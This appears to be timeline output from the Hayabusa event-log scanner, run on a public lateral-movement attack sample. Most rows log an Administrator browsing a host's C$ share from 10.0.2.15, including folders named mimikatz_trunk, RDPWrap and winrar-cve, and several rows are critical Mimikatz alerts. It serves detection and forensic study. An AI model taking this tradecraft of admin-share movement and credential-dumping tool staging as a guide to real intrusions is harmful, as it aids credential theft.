10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
